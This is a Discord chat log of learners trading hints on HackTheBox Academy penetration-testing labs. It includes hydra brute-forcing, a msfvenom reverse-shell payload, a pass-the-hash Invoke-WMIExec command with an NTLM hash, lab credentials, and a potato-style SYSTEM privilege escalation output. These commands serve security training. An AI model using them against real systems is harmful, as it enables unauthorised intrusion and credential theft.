Testing {8F5DF053-3013-4dd8-B5F4-88214E81C0CF} 1337
......
[+] authresult 0
{8F5DF053-3013-4dd8-B5F4-88214E81C0CF};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

idk about the juicy potato. but i have solved this using another method

how ?

feel free to dm

Im on "Password Attacks - Credential Hunting in Linux." The question is: Examine the target and find out the password of the user Will. Then, submit the password as the answer. Following the hint's advice(at least I think), I have added kira's password to the password.list file given to us in the resources . Then I did: hashcat --force password.list -r custom.rule --stdout | sort -u > mut_pass.list Finally I run the bruteforcer: hydra -l kira -P mut_pass.list ftp://10.129.202.64 -t 48

To those who have passed this challenge, have I made any mistakes?

you can just do the password from the hint by itself, rather than the whole list

@fringe shell thx I knew something was wrong lmao found it

how i can solve this

All good 😉 I tested and ||the latest version of the tool can be run with python3.9 on the target, so the lab should be fine ||

What is confusing you?

i do not how i can filter the results

There's an option in curl I believe, the page should tell you what you need, make sure you read the section carefully

sorry but i can not get it

I am not at my computer to assist further

I remember this one, I struggled a bit
There’s a lot of different solutions probably, but I used ||grep||

A combination of grep, cut, and others work

Googling I did find an htb forum post about it too

Yeah I looked at my solution command I kept and I used grep with regex

who said the user in question would have a home folder on the box?

typically a user does, but they dont necessarily have to have one

even more mind-blowing: there can be a home folder present for a user that doesnt exist!

so lesson is dont trust home folders to translate 1to1 users on a box

Currently working on the last two questions of the "AD Enumeration & Attacks - Skills Assessment Part II" module. I've cracked the C**** user's password and am trying to figure out how to access the DC. Can someone give me a nudge?

DM

What is the 2021 OWASP Top 10 classification for this vulnerability?

i couldnt ss from my VM even tho i did it with windows shift s but anyways could some answer that question for me.

Anybody know what was the number one OWASP web vulnerabilities in 2021?

😭

I cant take it anymore!

Service start timed out, OK if running a command or non-service executable

Can someone hint to what wordlists im supposed to use for the attacking common services easy on the S*** service, I have tried both the user and pass wordlist included in the resources and now have tried another like 6 wordlists in the /wordlists folder

your right ahead of me, you trying to help me out while you wait for your help

wdym stream it?

honestly dont even worry about the question, focus on trying to escalate first and fill in the questions later

https://academy.hackthebox.com/module/115/section/1132

nothing works

TypeError leaking initial Frag size, is the target patched?
[*] Exploit completed, but no session was created.

the module says to use a certain exploit but the target is not vulnerable to it... I swear half the time its because of some weird issue like this

its rigged 😭

which question are you on?

Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension)

even the next module is giving me the same error

I gave up and started playing Halo

I tried different exploits, I even scanned it to see if it was vulnerable to Eternal Blue but its NOT

you just have to follow the example in the module

I did

I searched msfconsole for the smb exploit

I set the options

when you run search smb whcih exploit did you choose?

exploit(windows/smb/psexec)

should work assuming you set all the options correctly, I just ran it to double check.

can you show me the options you set?

yeah

I am trying to update metasploit

maybe it will work

rhosts is the target ip

lhost is tun0

user "htb-student" and password "HTB_@cademy_stdnt! for smbuser and smbpass

I cant belive you got it

there is something wrong on my end

did you set the share? run it again after it updates.

yes

if that doesnt work maybe try resetting your VPN connection. not sure, it did work for me just now.

yes, I tried the restart vpn, reset target..

but even the next section, Infiltrating Windows gives me the same error

did you try on the pwnbox just to see if that works?

ah no I didnt, good idea!

it is my vm then

😭

can you believe I spent hours on something so simple

I have been there many times....

didnt work

Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (10.129.201.160:445) timed out.

I changed the lport to 445 and then get the same error as my kali vm, Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

omg

I set lport to 1337 and I got in

now I get Terminate channel 1? [y/N] every time I enter a command

I finally got it

thanks @tidal mango

because in this instance the route to privilege escalation is indeed within taught information

its not like its own seperate binary subject. all of hacking is arguably privilege escalation lol

its just a word

dont obsess over the word

just focus on the taught information and methodology

guzzling from the firehose and surviving is half the fun of hacking

for
Module name: Attacking Common Applications
Section name: - Attacking Thick Client
how do i bypass the error System.Management.Automation.Runspaces.InitialSessionState' ?
seems like i get this issue by deselecting the delete subfolders and files and delete?

nvm i got it

just had to open powershell first so it doesnt get murdered (if anyone has another way pls share )

Hello guys need some help with Linux fundamentals module

Path is file system management

I have submitted the answer in the format:000

But also it is not accepting

Any guesses?

Question is

What is the size in GiB of the "/dev/sda" disk in our PwnBOx? Format:000

My file size is 8gb

But 008 is not accepting

or is the wrong answer or there is some space before and after. What is the command you used to see the size of the disk?

no it still says wrong ans

nvm i just figured

Oh my god for the Getting Started -Public Exploits section. I was overthinking... it was right in the question. I was using gobuster trying to find a path.

feels so good though

Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: **, 1 space)

it's not accepting the hostname

any tip ?

mod :SHELLS & PAYLOADS

shouldn't be the user rather than the hostname?

(Format: **, 1 space)

are you submitting the hostname or the user?

yes

Hi everyone, i have a question about the skill assessment part 1 of the active directory module. I managed to answer the first three questions and I managed to establish a tunnel with the internal network. However, I can't find out which IP address computer MS01 corresponds to. So I can't connect with xfreerdp to go on to the next step. Can anyone help me?

you can use nslookup to find the IP of MS01

Thank you

I have the same problem, Any hint?
module: attacking common applications --> WordPress --> Using the methods shown in this section, find another system user whose login shell is set to /bin/bash.

I've enumerated with sudo wpscan --url blog.inlanefreight.local –enumerate u (found user:doug) , bruteforced the password. Logged in, enumerated users again (wp-admin + xmlrpc) but no extra accounts, in the adminpanel there are only 2 users know.

hello

@fiery berry

lsblk -b /dev/sda

NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 8589934592 0 disk
├─sda1 8:1 0 7515144192 0 part /
└─sda2 8:2 0 1073741824 0 part [SWAP]

This was my output

seems absolutely legitimate

use the -l option

Hello to everybody. I was able to get flag 2 from sqlmap module with --batch --dump command. But this gave me all the tables and results of the injection. I just want to have the content of flag2 on screen. I try this with -T flag2. This seems it doesn't work while also the injection is not perform. Do you know why?

bro i swear

@spring tundra

i have the account email and pass

u need to specify the database with -D

just not the 2fa

I pinged a moderator for you so you can get support

Ah its a database is not a table. LoL. Thank youuuu for the info

Ok i will try

Mainly it does it also with -t is just that without the --dump comand you dont see the results on screen. You need to manually cat the results from the folder it saves the output.

question 3 of sessions in metasploit module I try to privesc with 2 public exploits I found but I'm getting error : ./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit) please help been on this for DAYS now

What are you after?

@fiery berry

htb-student@nixfund:~$ lsblk -b -l /dev/sda
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 8589934592 0 disk
sda1 8:1 0 7515144192 0 part /
sda2 8:2 0 1073741824 0 part [SWAP]

Got this output

~~remove the -b, use only the -l. ~~You can just use lsblk and nothing more

Ok

@fiery berry

htb-student@nixfund:~$ lsblk -l /dev/sda
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 8G 0 disk
sda1 8:1 0 7G 0 part /
sda2 8:2 0 1G 0 part [SWAP]

is that the pwnbox?

8G is incorrect

HTB academy Linux fundamentals

File system management

can I see a screen of your terminal? I don't recon the hostname "nixfund" unless I'm missing something

Hi! Im doing the Kerberos Attacks skill assessment, I was unable to crack the ||daniel.whitehead|| hash, is it supposed to be like that?

Hi all!! I am doing Using Splunk Application. I have connected to https://TargetIP:8000 but couldn't find Sysmon App for Splunk to access it. I have also checked if there is a downloaded file so that i can install it but no luck. Can someone please help me with this?

hi, i have a question about https://academy.hackthebox.com/module/54/section/511 -- Attacking Web Applications with Ffuf, Skills Assessment - Web Fuzzing.
i'm on the "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" question and have fuzzed each of the servers with

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:32562/FUZZ -recursion -recursion-depth 1 -e .php -v -mc 200,301

• i haven't been able to pick out the access denied page. can anyone tell me if i'm on the right track?

You should be able to crack the hash with Hashcat.

||-m 18200 ||

In **Active Directory Enumeration & Attacks ** > Living Off the Land > Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. [...]

what does "administrative privileges" means ? I can easily filter disabled accounts and display description (and find the flag) but could someone explains me what I may be supposed to do to filter on users with "administratives privileges" please ?

Hello Everyone
Today is a wonderful after almost a YEAR, i finally completed the Penetration Tester Path.. Thanks to everyone who has been of assistance to me during the journey.. I'm looking forward in taking the CPTS, eJPT in one or two month time.. wish me luck

https://academy.hackthebox.com/achievement/361921/path/16

Hi everyone, I'm having trouble with section Sudo of module Linux Privilege Escalation. The attacks shown in the module do not work. The only thing I can use with sudo is ncdubut sudo /bin/ncdu throws the error Sorry, user htb-student is not allowed to execute '/bin/ncdu' as root on ubuntu. Can someone give me a hint? 🙂

Congrats and good luck

Think domain admins in this case

ok thanks : so it's just about doing a group membership LDAP filtering ?

check the sudo version

Key word is disabled in this case anyways but yeah ig

I did that for some reason was not able to crack it, found it using a smb bruteforce via crackmapexec

Check your DM

Thank you very much. I had a knot in my head 🙂

im currently trying to complete this question: "Exploit the Apache Druid service and find the flag.txt file. " but when i search for exploits i can only find an information disclosure and an RCE that i dont think works, any help would be appreciated.

this is the service :||2181/tcp open zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)|| this is the RCE ||:exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution
|| this is the info disclosure: ||auxiliary/gather/zookeeper_info_disclosure 2020-10-14 normal No Apache ZooKeeper Information Disclosure||

if the RCE is meant to work then ill just keep trying

hi, replying to see if anyone can chime in on this. tnx!

is there a reason youre looking for .php files? @elder ibex

when i did the initial fuzz to identify exts, that was one of them. i re-ran the command for each of the file exts.

i was able to answer the previous question in the assessment correctly - "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? "

youve tried with each subdomain you found too?

youre only matching 200 and 301

yepper...i definitely could have done something wrong. but, i basically did that same command, changing the sub-domain name and running that against each of the file exts.

hmm, i'll try it again w/out the matching.

if youre meant to have access denied youll probably get a different response code

well, the page says "you don't have access to this file" in the lab it was a status 200 for that page

worth a try, could also match that phrase

worth a try.

bruh

https://academy.hackthebox.com/module/115/section/1139

How were we supposed to know for the first question without looking at the hint??

the hint gives usernmae/password but how were we even supposed to get that man

Sorry what hint?

I just looked at the linked module, and none of the hints show creds

If you're referring to the "rdp to" part: then that's very much not a hint lol

its slightly up in the page if you scroll up. Usually there isnt a hint there

You have to click on it to show

Default creds

I searched for those but I never saw that certain password.

thank you for helping me again by the way

Np

I just googled the password in the hint verbatim and it doesn't pull up any results. I dont believe they are default

İ think default creds is something you should see from word list perspective

What module is this ?

https://academy.hackthebox.com/module/115/section/1139

The Live Engagement

It's probably also findable via enumeration

yes

Oh wait I think on the attack machine they give you a creds file

omg

I NEVER open that file

thanks

Iirc it gives you creds for the other victim(s)

I had to think for a sec

yeah it has another set

Cause I remember feeling smrt when I figured it out lol

yeah the credentials for the payloads & shells aren't default iirc

ugg...i'm still having trouble with this one. per @fresh jay, i removed the -mc to open it up. but, still can't identify the right page.

ffuf has an option to search for specific text inside the web page, that should help

i'll give it a try. tnx.

password attacks, password reuse/Default Passwords. The question where you need to get the MySQL password. This is what I did so far: ssh as sam, read history, check other users, but were unable to read their histories or copy id_rsa or the bak files. I couldn't figure out how to do a privilege escalation or lateral movement to another account. So now, I am trying to brute force kira's ssh password with the mut_password.list that generated on previous session. However, after 5hrs and still running, not luck. Any hints?? I will keep the hydra brute forcing running until it finish, but I would like to know if there is anotherr way about this?.

Try to paste it without using markdown

hi, thanks again for the tip. i'm still having trouble tho. i tested the syntax with:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:58232/FUZZ -recursion -recursion-depth 1 -e .php,.phps,.php7 -mr 'Welcome'
and had success. then i used this:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://faculty.academy.htb:58232/FUZZ -recursion -recursion-depth 1 -e .php,.phps,.php7 -mr 'have access'
no luck. i'm missing something. but, not sure what.

for ease of access, here's my original question: hi, i have a question about https://academy.hackthebox.com/module/54/section/511 -- Attacking Web Applications with Ffuf, Skills Assessment - Web Fuzzing.
i'm on the "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" question and have fuzzed each of the servers with

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:32562/FUZZ -recursion -recursion-depth 1 -e .php -v -mc 200,301

i haven't been able to pick out the access denied page. can anyone tell me if i'm on the right track?

For commands you can use the backticks for code blocks (commands) - https://support.discord.com/hc/en-us/articles/210298617-Markdown-Text-101-Chat-Formatting-Bold-Italic-Underline-

thanks..i figured out it was the hashtag...sorry about that

Hello, got a small question
For the question "What is the type of the service of the "syslog.service"? " from Linux Fundamentals I tried to command "systemctl show syslog | grep Type"

On my VM I only get:
ExitType=main

On a Pwnbox I get:
Type=notify ||-> This is the answer||
ExitType=main

Anyone know why?

syslog is probably configured for notification on the pwnbox

check the 'whois' output on the command line. You're close but the answer is a little longer

I have a question about The Live Engagement, second question at https://academy.hackthebox.com/module/115/section/1139
I have been trying to get this payload to work:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ipaddress LPORT=4321 -f war > nameoffile.war
I did ifconfig and tried all of the ip addresses for the LHOST option but netcat never hears anything back

Module: OSINT Corporate Recon

I'm having trouble with the last question on the Domain Structure module: "How many JS resources on the website?"

I skimmed through the module but I'm not having any luck. Any help is appreciated.

Thanks

yw

For those who've completed the "Whitebox Attacks" module, mind a quick assist with the clientside paramater pollution section. Not sure I understand the objective.

Yow people

or khaotic

could you please help me

Something just doesn't add up

I don't get any flag in introduction to bash scripting

ahem git gud

Did you follow the lesson?

i'm still stuck on this, if anyone has any ideas. the hint says to use PORT. that sounds like making the port a variable...is my understanding correct??

typically all caps like that would indicate a variable of some type - yes

so, they want me to build a list of ports and scan all of them, along with the other variables...this could be a long day.

Hi everyone! I'm a bit stuck on the skill assessment of the active directory module. After downloading chisel to create a tunnel, I've been trying for several days to upload chisel to the first machine on the network (the pivot machine). I haven't been able to do it and it crashes every time. Does anyone have any idea how I can do this?

I used the web shell, and i tried with a reverse shell with Invoke-WebRequest and a python server on my attack host

hello, i'm new on discord. i have a simple question. why can't i send messages on the pwnbox channel and other channels?

Hello!
I am doing the "Linux Fundamentals" module, and I'm stuck at the section "Find Files and Directories", specifically in the question "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?".

I tried to answer it with the command find / -type f -regex ".*conf.*" -size -28k -size +25k -newermt 2020-03-03 -exec ls -ls {} \; 2>/dev/null, and there are more than 10 files that match this filter. After some time testing other commands I decided to copy and paste every single file in the input box, and none of them was the correct one :c

btw, I use -regex ".*conf.*" because none of the files with -name *.config were the answer either

Read and follow #welcome

Does anyone know if there's something wrong with the question or I'm not doing it correctly?

@acoustic owl thank you! i'll try that

Im in the PtH module on the final question. On powershell I do: .\Invoke-WMIExec.ps1 -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e <base64 powershell string here>

But this won't show up in my netcat listener

I don't have notes on that specific exercise, can you tell me what the IP addresses are of DC01, the box you've compromised, and the IP of where your netcat listener is at?

The IP of the compromised server I'm on is 10.129.29.171 . The IP of DC01 is 172.16.1.10 . My listener is on 10.129.29.171

@trail leaf

So you're running the listener on the compromised server? 🤔

that should work then

I thought you were running it on the pwnbox, at which point I'd tell you that DC01 can't reach the pwnbox because they're on different networks with no route to each other

right

Have you tried importing it as a module and then running the command, that might be your problem

do you get any errors?

what is your encoded powershell command

Hello all, im currently working on the "Information Gathering: Web Edition" module in the CBBH path. I cannot seem to be able to connect to app.inlanefreight.local or dev.inlanefreight.local. I have already added them to my /etc/hosts along with the IP. I feel like ive scoured the entire internet to fix this and I cant seem to do it. Any ideas?

I imported it with: Import-Module .\Invoke-TheHash.psd1

are you connected to the vpn

on the vpn yea

not you

other guy

😶‍🌫️

no i am not

i think ive figured out my error. lol

ip of reverse shell: 10.129.29.171:8001

then you should just be calling Invoke-WMIExec <options...>

no need to do the .\

Im going to send some screenshots

eyo guys im trying to checking my account here on disc but the bot told me that isn't my ID. It isn't my ID student?

again, don't do .\Invoke-WMIExec, leave that out, just do Invoke-WMIExec

If you've imported the module, those functions will be available from the shell

ok

Now I'm getting an error

alright I'm opening a VM now give me a second

ok, and btw you're the best 😄

typically all caps like that would indicate a variable of some type - yes

Question: What IP did you enter when creating the reverse shell command?

10.129.29.171

Wow that was fast

If the DC ip is 172.16.1.10, how will it know where 10.129.29.171 is?

Whichever one is in the same subnet as the target on your attack machine

Multiple ips, different subnets

DC01 doesn't have a NIC for 10.129.x.x, so giving that as the IP address means it has no clue where to send the connection back to

What module are you on?

But yes the correct callback would be 172.16.1.5, if you're doing port forwarding and tunneling that's where the fun is

This is pass the hash in password attacks

Ah

GOT IT!

Then you're not really gonna need a reverse shell

You're already where you need to be

well pretty much anyway, I just had to type that because the reverse shell finally replied

responded*

I should be able to get it myself from here

Thanks

@trail leaf How was the Business CTF??

My team got banned from it for being too good

Well and because we weren't all real employees of the company. but the too good part is what made them get suspicious of us

This isn't the place to discuss

oops

👢

my fault

I did it last year, not sure why I still have the role

Hey guys. very basic question. Sometime I see the use of "" double dots sometimes they use '' single dots. For example for sqlmap sometimes the examples are with "" sometimes with ''. Does it matter?

I think it doesn't matter. As long as it is consitent?

stuck on Windows Privilege Escalation pillaging i used samdump2 giving it the 'SYSTEM' and 'SAM' file and gave it the hash for Administrator but nothing worked. i think i am getting an 'empty hash'

It actually does matter as with most cases double quotes ("") interprets as string and commands, and single quotes ('') is literal string and it doesn't try and parse commands or special characters in the line

try it with secretsdump, instead.

hey, is there any way to enumerate all local groups a domain user is a member of in an AD environment? edit: I want to enumerate from a Linux machine

What module is this for?

It's for AD enumeration and attacks. You find all kerberoastable users, then he asks which group the user is a member of in the dc.
The impacket tool shows it, but I wonder if there are other ways

¯_(ツ)_/¯

just query ldap no?

hello could somone please help me i am in attacking common services module, and i have some troubles with this question "wha is the password for the username jason" i used auxiliary/scanner/smb/smb_login in metasploit then i puted the RHOSTS but after that idk how to set resources that HTB gave me to execute the brute force attack can someone please help me ?

it's not AD but local groups

ohhh

I think the only way is having access to the user on each host (maybe?)

options should give you all available, changeable, fields fir the exploit

thanks @fathom pendant ❤️

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb/rpcclient-enumeration

I want to say enum4linux-ng should also work here but I'm not sure about that one

AD Enumeration & Attacks - Skills Assessment Part II .Locate a configuration file containing an MSSQL connection string. there is no file in smb and i think their is supposed to be. Im logging in with BR086
user

doesn't have to be in a shared folder 🤷‍♂️

enumerate it thoroughly

thanks for the help, I finally got it using ldapsearch and windapsearch

ldapsearch underrated

people get too intimidated by proper LDAP syntax

true, chatgpt can build it for you